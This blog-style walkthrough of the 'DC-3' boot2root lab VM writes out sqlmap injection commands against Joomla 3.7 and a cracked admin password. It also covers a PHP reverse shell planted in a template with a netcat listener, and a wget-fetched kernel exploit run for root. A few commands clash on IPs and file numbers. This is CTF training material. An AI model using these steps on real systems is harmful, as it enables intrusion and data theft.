Hello friends! Today we are going to take another boot2root challenge known as “DC-3”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.
Security Level: Beginner
Penetrating Methodology:
·
Discovering Targets IP
·
Network scanning (Nmap)
·
Surfing HTTP service
port
·
Searching
exploits via searchsploit
·
Using
SQLMAP to dump databases information
·
Using
John the Ripper to Crack the Password
·
Login
into JOOMLA
·
Inject
malicious PHP Reverse Shell Code
·
Using
Netcat for obtaining reverse connection
·
Exploit
the kernel
·
Getting
root access
·
Reading
Final flag
Let’s start off with scanning the network to find our target.
netdiscover
nmap -A 192.168.1.101
From nmap result we found only HTTP service is running on port 80 and we got to know that JOOMLA CMS is installed on this website.
So, we navigate to port 80 by exploring
target IP in the web browser and read the text message of the admin, moreover
the website was running on joomla CMS as found above.
So to identify installed joomla version, we checked its Readme file. We can clearly come to know about the version of Joomla 3.7, I think this is might come in handy.
We looked for Joomla
3.7 in searchsploit and found JOOMLA SQL INJECTION exploit. We copied
the exploits 42033.txt file on our
machine and read it contents. It revealed a Command for Sqlmap
along with a vulnerable URL.
Then we executed given below sqlmap command
and with the help of it we look for the Database names that revealed database 5
entries as shown in the image given below where I notice joomladb.
sqlmap
-u
"http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"
--risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Let’s again use Sqlmap to look for the
tables and column.
sqlmap
-u
"http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"
--risk=3 --level=5 --random-agent -D joomladb --tables --batch
After getting the table names, we have dumped
the contents of table #_users using
sqlmap, which revealed credentials which that come in handy to log into JOOMLA.
But the password is encoded, we need to crack it. Time to fire up John up.
sqlmap
-u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"
--risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password
--dump --batch
We have saved the hash in our system and use john the ripper to crack the hash. Now we have both the credentials to log into Joomla.
Username- admin
Password- snoopy
Let’s login into joomla as admin.
After spending some time exploring, we got an idea to add a malicious
PHP code (available inside kali: /usr/share/webshells/php) in index.php of beez3 template for getting
reverse shell as shown below.
On the other side, we
setup a netcat listener. Upon Execution, we got the shell of the target system.
To get a proper shell, we have used the python one-liner to spawn the TTY
shell.
nc
-lvp 1234
python
-c 'import pty;pty.spawn("/bin/bash")'
uname
-a
lsb_release
-a
From the LSB description, we clearly
knew for this version of Ubuntu has a direct exploit which can be used to get
the root access and found our final flag.
Without wasting time, we found a
privilege escalation exploit for ubuntu 16.04. We have downloaded it and
extracted it.
cd
/tmp
wget
https://www.exploit-db.com/exploits/39772
unzip
39722.zip
ls
cd
39772
ls
tar
-xvf exploit.tar
After running the
exploit, we have easily got the root access and thus got our Final flag.
ls
cd
ebpf_mapfd_doubleput_exploit
ls
./compile.sh
ls
./doubleput
cd
root
ls
cat the-flag.txt
0 comments:
Post a Comment